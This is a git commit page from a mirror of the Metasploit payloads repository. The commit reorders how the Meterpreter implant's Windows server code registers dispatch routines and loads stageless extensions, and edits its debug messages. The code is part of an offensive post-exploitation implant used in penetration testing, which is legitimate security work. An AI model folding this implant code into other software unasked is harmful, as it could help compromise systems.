github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-11-26 17:41:08 +01:00
Code Releases Activity

Finalise stageless initialisation scripts

Browse Source
This commit is contained in:
OJ 2015-11-10 20:00:34 +10:00
parent dca4cc46be
commit c692e76332
2 changed files with 12 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
c/meterpreter/source/server/metsrv.c Normal file → Executable file
View File

@ -14,8 +14,9 @@
DWORD __declspec(dllexport) Init(SOCKET fd)
{
// In the case of metsrv payloads, the parameter passed to init is NOT a socket, it's actually
// a pointer to the metserv configuration, so do a nasty cast and move on.
MetsrvConfig* metConfig = (MetsrvConfig*)fd;
// a pointer to the metserv configuration, so do a nasty cast and move on.
MetsrvConfig* metConfig = (MetsrvConfig*)fd;
dprintf("[METSRV] Getting ready to init with config %p", metConfig);
DWORD result = server_setup(metConfig);
dprintf("[METSRV] Exiting with %08x", metConfig->session.exit_func);

16
c/meterpreter/source/server/server_setup_win.c
View File

@ -81,6 +81,8 @@ VOID load_stageless_extensions(Remote* remote, MetsrvExtension* stagelessExtensi
stagelessExtensions = (MetsrvExtension*)((LPBYTE)stagelessExtensions->dll + stagelessExtensions->size);
}
dprintf("[SERVER] All stageless extensions loaded");
// once we have reached the end, we may have extension initializers
LPBYTE initData = (LPBYTE)(&stagelessExtensions->size) + sizeof(stagelessExtensions->size);
@ -94,7 +96,7 @@ VOID load_stageless_extensions(Remote* remote, MetsrvExtension* stagelessExtensi
initData = data + dataSize;
}
dprintf("[SERVER] All stageless extensions loaded");
dprintf("[SERVER] All stageless extensions initialised");
}
static Transport* create_transport(Remote* remote, MetsrvTransportCommon* transportCommon, LPDWORD size)
@ -369,6 +371,12 @@ DWORD server_setup(MetsrvConfig* config)
// Store our thread handle
remote->server_thread = serverThread->handle;
dprintf("[SERVER] Registering dispatch routines...");
register_dispatch_routines();
// this has to be done after dispatch routine are registered
load_stageless_extensions(remote, (MetsrvExtension*)((LPBYTE)config->transports + transportSize));
// Store our process token
if (!OpenThreadToken(remote->server_thread, TOKEN_ALL_ACCESS, TRUE, &remote->server_token))
{
@ -394,12 +402,6 @@ DWORD server_setup(MetsrvConfig* config)
remote->orig_desktop_name = _strdup(desktopName);
remote->curr_desktop_name = _strdup(desktopName);
dprintf("[SERVER] Registering dispatch routines...");
register_dispatch_routines();
// this has to be done after dispatch routine are registered
load_stageless_extensions(remote, (MetsrvExtension*)((LPBYTE)config->transports + transportSize));
remote->sess_start_time = current_unix_timestamp();
// loop through the transports, reconnecting each time.